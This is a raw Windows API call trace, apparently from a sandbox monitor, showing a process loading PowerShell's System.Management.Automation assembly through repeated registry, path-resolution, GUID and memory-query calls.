	[0400.620] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d45c, lpData=0x1885d0, lpcbData=0x28d458*=0x56 | out: lpType=0x28d45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d458*=0x56) returned 0x0
	[0400.621] CoTaskMemFree (pv=0x1885d0) 
	[0400.621] RegCloseKey (hKey=0x1c8) returned 0x0
	[0400.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0400.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0400.629] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x7b57f80e, Data2=0xcdee, Data3=0x4060, Data4=([0]=0xad, [1]=0x40, [2]=0x80, [3]=0x86, [4]=0xe3, [5]=0xb7, [6]=0x8e, [7]=0xca))) returned 0x0
	[0400.629] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x1ca7277c, Data2=0x90bc, Data3=0x45d7, Data4=([0]=0xb6, [1]=0xf5, [2]=0x93, [3]=0x27, [4]=0x86, [5]=0x72, [6]=0x9d, [7]=0x37))) returned 0x0
	[0400.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0400.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0400.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0400.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.060] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xf543c44, Data2=0x8283, Data3=0x4bc6, Data4=([0]=0xb3, [1]=0x84, [2]=0xbc, [3]=0x4, [4]=0x55, [5]=0x92, [6]=0x82, [7]=0x58))) returned 0x0
	[0401.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.454] VirtualQuery (in: lpAddress=0x28b740, lpBuffer=0x28c600, dwLength=0x30 | out: lpBuffer=0x28c600*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.455] VirtualQuery (in: lpAddress=0x28b7d0, lpBuffer=0x28c690, dwLength=0x30 | out: lpBuffer=0x28c690*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.457] VirtualQuery (in: lpAddress=0x28bf50, lpBuffer=0x28ce10, dwLength=0x30 | out: lpBuffer=0x28ce10*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.459] VirtualQuery (in: lpAddress=0x28bf50, lpBuffer=0x28ce10, dwLength=0x30 | out: lpBuffer=0x28ce10*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.460] VirtualQuery (in: lpAddress=0x28bf50, lpBuffer=0x28ce10, dwLength=0x30 | out: lpBuffer=0x28ce10*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.461] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.461] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.461] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.462] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.462] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.462] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.462] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.462] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.462] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.463] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.463] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.463] VirtualQuery (in: lpAddress=0x28bb80, lpBuffer=0x28ca40, dwLength=0x30 | out: lpBuffer=0x28ca40*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.463] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.463] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.464] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.464] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.464] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x14f59578, Data2=0x78a5, Data3=0x48cd, Data4=([0]=0xbe, [1]=0xa8, [2]=0xd6, [3]=0xb3, [4]=0xf, [5]=0xb4, [6]=0xd8, [7]=0xd7))) returned 0x0
	[0401.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
